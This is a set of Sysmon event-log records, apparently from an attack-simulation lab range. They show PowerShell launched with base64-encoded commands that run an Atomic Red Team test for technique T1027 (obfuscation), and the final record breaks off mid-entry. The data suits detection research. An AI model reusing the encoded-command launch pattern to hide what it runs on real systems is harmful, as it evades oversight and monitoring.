{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5467,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.117\r\nProcessGuid: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nProcessId: 3088\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nParentProcessId: 796\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.117","ProcessGuid":"{A837DB8D-032F-5F25-0000-0010BE790A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032E-5F25-0000-00105B620A00}","ParentProcessId":"796","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5468,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nSourceProcessId: 796\r\nSourceThreadId: 1540\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44558890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-00105B620A00}","SourceProcessId":"796","SourceThreadId":"1540","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44558890)","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5469,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5470,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5471,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5472,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5473,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5474,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 